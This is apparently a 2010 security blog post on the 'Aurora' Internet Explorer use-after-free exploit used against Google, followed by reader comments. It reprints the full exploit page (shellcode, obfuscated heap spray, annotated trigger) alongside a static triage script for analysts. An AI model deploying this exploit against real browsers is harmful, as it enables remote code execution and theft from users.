The big news hit earlier this week: the attack vector that let bad actors, presumably from China, into the networks of Google, Juniper, Adobe, and some 29 other firms was an Internet Explorer zero day, a use-after-free vulnerability reached through an invalid pointer reference. It affects IE 6, 7, and 8, but according to Microsoft it was only used by the attackers against IE 6. Per Microsoft’s Advisory 979352: “In a specially-crafted attack, in attempting to access a freed object, Internet Explorer can be caused to allow remote code execution.” Earlier today this entry from yesterday at Wepawet (an online analysis engine for malware) was pointed out to H.D. Moore, and within hours Metasploit had an exploit for the vulnerability integrated. McAfee has confirmed that the exploit now in the open is the same one they saw during their investigation. The video below demonstrates how the attackers initially gained access to the corporate networks of Google et al. using this zero day.
Here It Is
The video below demonstrates how Google and the rest were, according to most news reports, exploited via the “Aurora” vulnerability in Internet Explorer and had their “intellectual property” taken.
In the video you will see Metasploit set up a listener, stand up a web site that serves the malicious page, and an unsuspecting user visit that site, trigger the IE vulnerability, and unknowingly open a connection back to a computer owned by the attacker. The attacker then lists the user’s processes and elects to kill Notepad, where the user was working on an important document. IE 6.0 is used, as this is the version Microsoft references as having been used in the “targeted attacks” on some 30+ U.S. companies.
A silly example for demonstration purposes, to be sure, but once the backdoor to the user’s PC is open the attacker can use it as a pivot point for further attacks against the internal network, escalate his or her privileges, take information off the PC; basically do anything the user can do. The shell runs with exactly the rights of the logged-in user, so a user who browses as a local administrator hands over the whole machine in one click.
The Vector
The attack scenario is that users were pointed to a web site (probably through a targeted e-mail, an attack called spear phishing) carrying JavaScript that first sprays the heap with shellcode and then triggers the invalid pointer reference, so that IE dereferences a freed object and lands in the sprayed code. Reading the page below top to bottom: the "sc" string is the shellcode; the "sss" integer array is an obfuscated heap-spray loop (every value is seven times a character code) that is decoded and run with eval(); ev1() keeps a reference to the IMG element alive inside an event object and then destroys the element by clearing the span’s innerHTML; ev2() refills memory with the 0x0c0d pattern through the COMMENT nodes and finally touches e1.srcElement, the freed element, which is what hands control to the spray. The code below was released publicly yesterday.
<html><script>var sc = unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053
%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8
%ub230%u81d9%u9a30%ud8db%u3ad8%ub021%uebb4%ud8ea%uabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8
%u3053%ud9b2%u3081%udbfb%ud8d8%u213a%u3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2
%ub28b%u27d8%u9c8e%u18eb%u5898%udbe4%uadd8%u5121%u485e%ud8d8%u1fd8%udbdc%ub984%ubdf6%u9c1f
%udcdb%ubda0%ud8d8%u11eb%u8989%u8f8b%ueb89%u5318%u989e%u8630%ud8da%u5bd8%ud820%u5dd7%ud9a7
%ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e53%u30fc%udae5%ud8d8%u205b%ud727
%u865c%ud8d9%u51d8%ub89e%ud8b2%u2788%uf08e%u9e51%u53bc%u485e%ud8d8%u1fd8%udbdc%uba84%ubdf6
%u9c1f%udcdb%ubda0%ud8d8%ud8b2%ud8b2%udab2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fc%ud923
%ud8d8%u205b%ud727%uc45c%ud8d9%u51d8%u5c5e%ud8d8%u51d8%u5446%ud8d8%u53d8%ub89e%ud8b2%ud8b2
%ud8b2%u9e53%u88b8%u8e27%u1fe0%ua89e%ud8d8%ud8d8%u9e1f%ud8ac%ud8d8%u59d8%ud81f%ud8da%uebd8
%u5303%ubc86%ud8b2%u9e55%u88a8%ud8b0%ud8dc%u8fd8%uae27%u27b8%udc8e%u11eb%ud861%ud8dc%u58d8
%ud7a4%u4d27%ud4ac%ua458%u27d7%uacd8%u58dd%ud7ac%u4d27%u333a%u1b53%ud8f5%ud8dc%u5bd8%ud820
%udba7%u8651%ub2a8%u55d8%uac9e%u2788%ua8ae%u278f%u5c6e%ud8d8%u27d8%ue88e%u3359%udcd8%ud8d8
%u235b%ua7d8%u277d%ub8ae%u8e27%u27ec%u5c6e%ud8d8%u27d8%uec8e%u5e53%ud848%ud8d8%u4653%ud854
%ud8d8%udc1f%u84db%uf6b9%u8bbd%u8e27%u53f4%u5466%ud8d8%u53d8%u485e%ud8d8%u1fd8%udfdc%uba84
%ubdf6%u3459%ud9d8%ud8d8%u0453%ud8b0%ud8d9%u8bd8%ud8b0%ud8d9%u8fd8%ud8b2%ud8b2%u8e27%u53c4
%ueb23%ueb18%u5903%ud834%ud8da%u53d8%u5b14%u8c20%ud0a5%uc451%u5bd9%udc18%u2b33%u1453%u0153
%u1b5b%uebc8%u8818%u8b89%u8888%u8888%u8888%u888f%u5388%ud09e%u2f30%ud8d8%u53d8%ue4a6%uec30
%ud8d9%u30d8%ud8ef%ud8d8%ubbb0%uafae%ub0d8%ub0ab%ub7bc%u538c%ud49e%u6e30%ud8d8%u51d8%ue49e
%u79bc%ud8dc%ud8d8%u7855%u27b8%u2727%ubdb2%uae27%u53e4%uc89e%u4230%ud8d8%uebd8%u8b03%u8b8b
%u278b%u3008%ud83d%ud8d8%u3459%ud9d8%ud8d8%u2453%u1f5b%u1fdc%ueadf%u49ac%u1fd4%udc9f%u51bb
%u9709%u9f1f%u78d0%u4fbd%u1f13%ud49f%u9889%ua762%u9f1f%ue6c8%u6ec5%u1fe1%ucc9f%ub160%uc30c
%u9f1f%u66c0%ubea7%u1f78%uc49f%u7124%u75ef%u9f1f%u40f8%uc8d2%ubc20%ue879%ud8d8%u53d8%ud498
%ua853%u75c4%ub053%u53d0%u512f%ubc8e%udcb2%u3081%ud87b%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0
%ubdab%u8caa%ude53%uca30%ud8d8%u53d8%ub230%u81dd%u5c30%ud8d8%u3ad8%ueb21%u8f27%u8e27%u58dc
%u30e0%ue058%uad31%u59c9%udda0%u4848%u4848%ud0ac%u2753%u538d%u5534%udd98%u3827%ue030%ud8d8
%u1bd8%ue058%u5830%u31e0%uc9ad%ua059%u48dd%u4848%uac48%ub03f%ud2d0%ud8d8%u9855%u27dd%u3038
%ud8cf%ud8d8%u301b%ud8c9%ud8d8%uc960%udcd9%u1a58%ud8d4%uda33%u1b80%u2130%u2727%u8327%udf1e
%u5160%ud987%u1fbe%udd9f%u3827%u8b1b%u0453%ub28b%ub098%uc8d8%ud8d8%u538f%uf89e%u5e30%u2727
%u8027%u891b%u538e%ue4ad%uac53%ua0f6%u2ddb%u538e%uf8ae%u2ddb%u11eb%u9991%udb75%ueb1d%ud703
%uc866%u0ee2%ud0ac%u1319%udbdf%u9802%u2933%uc7e3%u3fad%u5386%ufc86%u05db%u53be%u93d4%u8653
%udbc4%u5305%u53dc%u1ddb%u8673%u1b81%uc230%u2724%u6a27%u3a2a%u6a2c%ud7ee%u28cb%ua390%ueae5
%u49ac%u5dd4%u7707%ubb63%u0951%u8997%u6298%udfa7%ufa4a%uc6a8%ubc7c%u4b37%u3cea%u564c%ud2cb
%ua174%u3ee1%u1c40%uc755%u8fac%ud5be%u9b27%u7466%u4003%uc8d2%u5820%u770e%u2342%ucd8b%ub0be
%uacac%ue2a8%uf7f7%ubdbc%ub7b5%uf6e9%uacbe%ub9a8%ubbbb%uabbd%uf6ab%ubbbb%ubcf7%ub5bd%uf7b7
%ubcb9%ub2f6%ubfa8%u00d8");
var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280,
238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833,
728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364,
350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686,
805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693,
322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833,
224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224,
735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637,
735, 651, 427, 770, 301, 805, 693, 413, 875);
// Stage 1: decode the obfuscated heap-spray loop (each value is 7 * charCode,
// "@" stands in for the one real comma) and run it. The decoded loop fills x[]
// with 200 blocks of a 0x0c0d sled followed by the shellcode in sc.
var arr = new Array;
for (var i = 0; i < sss.length; i ++ ){
arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/,/g, ""
);
cc = cc.replace(/@/g, ",");
eval(cc);
// Stage 2: 200 COMMENT nodes whose data strings will later be used to refill freed memory.
var x1 = new Array();
for (i = 0; i < 200; i ++ ){
x1[i] = document.createElement("COMMENT");
x1[i].data = "abc";
}
;
var e1 = null;
function ev1(evt){
e1 = document.createEventObject(evt);            // the event object keeps a reference to the IMG
document.getElementById("sp1").innerHTML = "";   // tearing down the span frees the IMG; e1 still points at it
window.setInterval(ev2, 50);
}
function ev2(){
p = "\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
for (i = 0; i < x1.length; i ++ ){
x1[i].data = p;   // refill the freed element's memory with 0x0c0d so its vtable pointer reads 0x0c0d0c0d
}
;
var t = e1.srcElement;   // dereference the freed element: the call through the fake vtable lands in the spray
}
</script><span id="sp1"><IMG SRC="aaa.gif" onload="ev1(event)"></span></body></html>
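What an analyst usually wants to do with a page like this is take it apart without letting it run. The block below is an added example written for this post; it is not code from the original page and not Metasploit’s module. It reproduces the first-stage decoder (divide by seven, strip the commas, swap “@” for “,”) without the eval(), pulls the spray geometry out of the decoded loop, and greps a constructed excerpt of the landing page for the steps of the use-after-free chain. The sss array is copied verbatim from the exploit above; the sample HTML is a hand-made excerpt containing only the trigger lines, and the indicator names are my own labels for what each line does.

```javascript
// Added example for static triage of the Aurora landing page (not the post's own code).
// "sss" is copied verbatim from the exploit above; sampleHtml is a constructed excerpt.

// Stage 1 of the exploit hides its heap-spray loop in an integer array: every value is
// 7 * charCode, the array is stringified (comma-joined), the commas are stripped, and
// "@" stands in for the one real comma the loop needs.
const sss = [826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280,
  238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833,
  728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364,
  350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686,
  805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693,
  322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833,
  224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224,
  735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637,
  735, 651, 427, 770, 301, 805, 693, 413, 875];

// Same transformation the page performs, minus the eval(): returns the hidden loop as text.
function decodeSprayLoop(values) {
  const chars = values.map((v) => String.fromCharCode(v / 7));
  return chars.toString().replace(/,/g, "").replace(/@/g, ",");
}

// Read the spray geometry out of the decoded loop, so the analyst sees what the page
// tried to place at 0x0c0d0c0d without attaching a debugger to IE.
function sprayParameters(loop) {
  const sled = /unescape\("%u([0-9a-f]{4})%u\1"\)/i.exec(loop);
  const grow = /while\(n\.length<=(\d+)\)/.exec(loop);
  const cut = /substring\(0,(\d+)-sc\.length\)/.exec(loop);
  const count = /for\(var i=0;i<(\d+);i\+\+\)/.exec(loop);
  if (!sled || !grow || !cut || !count) return null;
  return {
    sledWord: sled[1],                 // the repeated 16-bit value ("0c0d")
    growUntil: Number(grow[1]),        // n is doubled until its length exceeds this
    blockChars: Number(cut[1]),        // each block is (blockChars - sc.length) sled chars + sc
    blockCount: Number(count[1]),      // number of blocks kept alive in x[]
    bytesPerBlock: Number(cut[1]) * 2, // UTF-16: two bytes per code unit, about 1 MB per block
  };
}

// Constructed excerpt of the landing page: only the lines that matter for triage.
// Assumption: the real page carries these same lines, as shown above.
const sampleHtml = `<html><script>var sc = unescape("%u9090%u19eb");
var x1 = new Array();
for (i = 0; i < 200; i ++ ){ x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; }
function ev1(evt){ e1 = document.createEventObject(evt);
document.getElementById("sp1").innerHTML = ""; window.setInterval(ev2, 50); }
function ev2(){ p = "\\u0c0d\\u0c0d"; for (i = 0; i < x1.length; i ++ ){ x1[i].data = p; } var t = e1.srcElement; }
</script><span id="sp1"><IMG SRC="aaa.gif" onload="ev1(event)"></span></body></html>`;

// Each indicator is one step of the use-after-free chain described in the post.
const indicators = [
  { name: "event object keeps a reference to the image", re: /createEventObject\s*\(/ },
  { name: "innerHTML cleared, freeing the referenced element", re: /innerHTML\s*=\s*""/ },
  { name: "deferred callback runs after the free", re: /setInterval\s*\(/ },
  { name: "freed memory refilled through COMMENT nodes", re: /createElement\s*\(\s*"COMMENT"\s*\)/i },
  { name: "0x0c0d fill pattern (sled and fake vtable pointer)", re: /(\\u0c0d|%u0c0d)/i },
  { name: "freed element dereferenced through srcElement", re: /\.srcElement\b/ },
];

// Returns the names of every indicator present in the supplied page text.
function matchIndicators(html) {
  return indicators.filter((ind) => ind.re.test(html)).map((ind) => ind.name);
}

// Stand-alone run: print the decoded loop, its geometry, and the indicator hits.
const decodedLoop = decodeSprayLoop(sss);
console.log(decodedLoop);
console.log(sprayParameters(decodedLoop));
console.log(matchIndicators(sampleHtml));
```

The decoded loop is the whole second stage in one line: a two-character 0x0c0d string is doubled until it passes 512K code units, cut down so that sled plus shellcode fill one block, and 200 such blocks are kept alive in an array. Because 0x0c0d as a 16-bit value is stored as the bytes 0d 0c, a pointer-sized read from the refilled object gives 0x0c0d0c0d, which points into the middle of that spray, where the 0x0c/0x0d bytes decode as harmless OR instructions until execution reaches the shellcode. The indicator list is deliberately loose (any one of the six on its own is common in benign pages); the useful signal is all six in one document, which is what this page looks like whether or not the shellcode or the array constants are changed.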
Update
- Ahmed Obied has published a clean Python version of the exploit (it opens Windows Calculator) for testing as well: ie_aurora.py.
- CVE-2010-0249 has been assigned to this issue.
Finally
“At this time, we are aware of limited, active attacks attempting to use this vulnerability against Internet Explorer 6. We have not seen attacks against other affected versions of Internet Explorer.” – Microsoft.
This situation has the potential to change rapidly now that the exploit is public. Microsoft last patched a vulnerability out of cycle in July of 2009; they could elect to pursue the same response here.
Or as McAfee correctly opines: “What started out as a sophisticated targeted attack is likely to lead to large-scale attacks on vulnerable Microsoft Internet Explorer users.”
You’re deluded if you think your video is a good presentation of something. No future in video production for you.
[...] VIDEO OF EXPLOIT IN ACTION [...]
Dudlifier – Cute… It’s not exactly our day job; we do have a few other things going on over here.
That’s what an attack looks like though: a listener is running, a malicious site is set up, the user visits it, and malicious processes start running in the context of that user. That’s it, no loud noises, no explosions, no flashing red lights, no mustache-stroking villains. You want that, you’ve come to the wrong outpost on the Intertubes.
Although chances are if you don’t know what you’re looking at, you’re probably in the wrong place anyway. How did you end up on an information security blog?
Thanks for the constructive comment though buddy boy. Come back anytime.
One thing I don’t understand: how is that possible? I mean we’re talking about Google; all people interested in security know that Google is well known for its high level of security. This 0-day shows that Google is actually using IE6 for some Googlers? Unbelievable. Even if it works for IE6, 7, and 8, I thought computers at the Googleplex had a lot of protections for the stack, AV, firewall, IDS etc.
I would have figured that a company as organized as Google would mandate their own browser, Chrome, on every desktop. Or at least have policy in place to use anything, anything but IE6.
[...] 2003, Vista, Server 2008, Windows 7 and Server 2008 R2. You can see the exploit in action over here. Microsoft has published a security advisory and is working on a patch. In the meantime, it is [...]
Think about it: A software company needs to have a handle on how its products work in many environments. This means occasionally relinquishing control to the windy browsers of fate. C’est la vie…
According to McAfee’s CTO, IE6 wasn’t the only browser used as an attack vector in these attacks. IE7 and 8 were also used, in a different way which we still don’t know.
[...] could, that the attacks came from the Chinese government (McAfee speaks of project “Aurora”). The government would do well to help clear this up. That they (who officially always censor [...]
[...] “After McAfee’s disclosure of an IE 0-day vulnerability this week that had been used in Operation Aurora, the hack and stealing of data from Google, Adobe and about 3 dozen other major companies, the [...]
Here’s my take: It’s all about defense in depth. I have some thoughts on the attack on my blog (http://miwsecurity.blogspot.com/2010/01/2010-coming-out-of-defense-in-depth.html).
The biggest issue as far as I can tell is that the present lip service given to internal systems MUST come to an end. Everyone seems to be spending their entire security budget on perimeter defenses and not enough on security training and internal controls. Seriously…spear phishing? That’s a complete falldown of security awareness training if you ask me.
Has anyone attempted to run this code against a workstation with Cisco Security Agent or a similar HIPS application installed?
Graham
Does the Metasploit or the in-the-wild attack leave any tangible evidence in system32? I’m currently handling an incident with some undetected malware which leaves around 5-12 files in system32. It looks like maybe a variant of Netsky, but then again some of the code could be shared. I doubt it’s the same, but it would be nice to have more details about what’s left behind.
@MICHAEL STARKS: how can your sploit be undetectable if it leaves files? Also: if you have a directory called system32 then you’re probably hacked. Because you’re stupid. Instead of researching stupid Windows malware, why don’t you get to a safe platform? Too stupid to meet that challenge? Guess so.
@GRAHAM THOMPSON: Close only counts in horseshoes. People are wasting money on Windows. Want me to say that again, or are you of above average intelligence and got it the first time around? And the Cisco guys are still running Windows stuff? You mean they’re stupid too? Gosh!
@NOTONLY: No not in a different way. He did not say that. They were used in the same way.
@JP: I have thought about it. It’s you who haven’t thought about it. They can sandbox Windows. Anyone who absolutely has to run Windows and doesn’t sandbox it is a fool.
@PREFECT: way cool. FTW!
LOL @CHROME: Nobody likes a linux fan boy, they have less social skills than their OS! Linux is great for a server, but if you truly think it’s a better desktop OS than Windows, then you sir are the fool!
You didn’t say Linux, but you’re not cool enough to own a Mac… I’m guessing Ubuntu!
Perhaps the arguments that open source, available to everyone to find and fix security flaws, make a little more sense now. I’d guess that the Chinese have been diligently studying Windows source since MS handed it over to them in 2003. They probably have a whole portfolio of 0-days in a folder.
First medication to this ailment
Organizations and individuals should stop using the really crappy IE. I wonder why no one is mentioning that!
Lol Dwyatt, I perfectly agree with you. I’d say they have a full dossier in an entire warehouse
“If you have a directory called system32 then you’re probably hacked. Because you’re stupid.”
yo..that’s rich ,seriously.
@BILL DUDLY: Why not a good presentation? Bill, I don’t want to think you still believe in “security through obscurity”; if so, you are deluded, man. Sharing this knowledge lets us open our eyes and lets everyone open their eyes, if you want to open them.
@TJ: Maybe Windows or Mac OS are mature OSes, and Linux is growing up too… Anyway, I am a Linux boy, sometimes a Mac boy and sometimes a Windows boy; each one fills a need at a given time… In security, no matter what OS you are using, all of these are hackable. All that is required is some research time… Security is a chain and one of the weakest links is THE USER. Sometimes some users are really stupid; other times they just do not have enough knowledge of what they are facing on the internet, maybe because they are not (well) trained.
To reduce the risk of attacks on the user side (client-side exploitation), maybe it could be a good idea to use this equation: (Training + Knowledge) + Common Sense.
@praetorianprefect.com: Good job guys! Follow in this way.
Just downloaded the HotJava 3.0 browser from java.sun.com/products/archive/hotjava/3.0/index.html. Looks quite nice and clean, strips stupid ad stuff. Cross platform, no OS fanboy fights. Probably not targeted for exploits. Looks good as a workaround while MS fixes IE. Might be confident enough to visit a porn site again.
[...] Demonstration of how the IE “Exploit” used in the attacks on Google works [ENG] praetorianprefect.com/archives/2010/01/the-aurora-ie-exploit… by crises 2 seconds ago [...]
To those who lambasted me for running windows, bla bla bla, I can only assume you have never worked as an infosec professional in an enterprise setting, and have never helped a customer with a security problem in a typical environment. That’s really all I have to say on the matter..
[...] , more detail below + video of it in action. Praetorian Prefect | The “Aurora” IE Exploit Used Against Google in Action __________________ paxnWo: I want to make love with black Kabron: =))) Kestor: [...]
[...] in action and some of the source code: http://www.darkreading.com/vulnerabi…leID=222301235 Praetorian Prefect | The “Aurora” IE Exploit Used Against Google in Action Reply With Quote + Reply to Thread « Bulletproof [...]
[...] thanks to the friends at http://praetorianprefect.com who have made a video showing how the crackers initially gained access to the networks [...]
Very informative video and information. Thanks.
[...] I’m happy to note that according to Google Analytics only 28% of you are using Internet Explorer. My hat’s off to 72% of you. If you are in that other 28%, however, unless you like your personal data compromised or you want to feel the thrill of having your PC ride in a botnet herd, use it to download Chrome or Firefox or Opera or Safari or whatever and don’t open it again until Microsoft gets out a patch for the Aurora exploit. [...]
Don’t FXXXing understand why every time those US companies have any hacking problem they point their fingers at others, bloody di-ck heads.
You made the software, you sell it, you get the profit, and you don’t want to get the blame. It’s your fault for not producing a better one, and then when sh-it happens you just try to blame others: first off the Russians, then the Middle East, then Gaza, and now the Chinese. Why don’t you point it at yourself? You simply ignore the facts and blame others.
[...] this interesting video. What can I say? Scary… I am removing IE from my office today. Praetorian Prefect | The “Aurora” IE Exploit Used Against Google in Action __________________ FlareVM.it: Xen virtual servers with guaranteed resources starting from [...]
Thanks for taking the time to show us how it works in action.
It doesn’t work for me. When the user opens the site I get: “Sending Microsoft Internet Explorer “Aurora” Memory Corruption to client”
I have metasploit:
=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 492 exploits - 230 auxiliary
+ -- --=[ 192 payloads - 23 encoders - 8 nops
=[ svn r8144 updated today (2010.01.18)
@Chrome: Not sure what you mean? Cisco guys running Windows? Close only counts with horseshoes? The only context Cisco came up in was if Cisco Security Agent (or other HIPS product) was able to protect an unpatched machine…As for horseshoes…?
Anyways, thanks to Praetorian Prefect for the excellent posting on this attack!
[...] Detailed info about Operation Aurora. Inderjeet Singh is the founder and main author of [...]
[...] at all you’ll know that the zero-day vulnerability codenamed Aurora (watch it in action on Praetorian Prefect) in Microsoft’s popular Internet Explorer web browser was the cause of the security breaches. [...]
[...] The attack against Google has been picked apart; a zero-day exploit in Internet Explorer was the method. The method was covered at CNET and is described in detail by McAfee’s CTO, George Kurtz, in a blog post. The blog Praetorian Prefect has a description and video of the attack in action. [...]
I need someone who can help me understand a bit the shell used here please, I can’t wait ;) good thanks for help kastos@live.com
[...] Video – Metasploit / “Aurora” IE Exploit: [1] http://praetorianprefect.com/archives/2010/01/the-aurora-ie-exploit-in-action/ [...]
Could you please publish the actual code of the exploit?
[...] of the popular hacking tool Metasploit, the exploit for this hole has now been made public. With it, it becomes possible to set up a web site through which the hole is abused. The [...]
[...] Praetorian Prefect Follow-up by George Kurtz, CTO Sergio Hernando’s blog [...]
[...] the exploit itself. Link to Praetorian Project. Links to the sploit: [...]
[...] praetorianprefect – Demonstration of exploiting the flaw using the new module from Metasploit: http://praetorianprefect.com/archives/2010/01/the-aurora-ie-exploit-in-action/ [...]
[...] cycle. The update is for the Internet Explorer vulnerability which was reported to be used by the Aurora exploit to attack Google and several other companies. The last time Microsoft released an out of band patch [...]
[...] in question affects all versions of Internet Explorer since IE 6 and can be seen in action over here. Microsoft is expected to release a patch later today to fix the [...]
Excellent presentation, as always. It worries me that people are still using IE6, pretty much proven to be the most insecure browser in the history of browsing, though.
[...] (under review) And some more random links: Code Used in Google Attack Now Public : programming Praetorian Prefect | The “Aurora” IE Exploit Used Against Google in Action [...]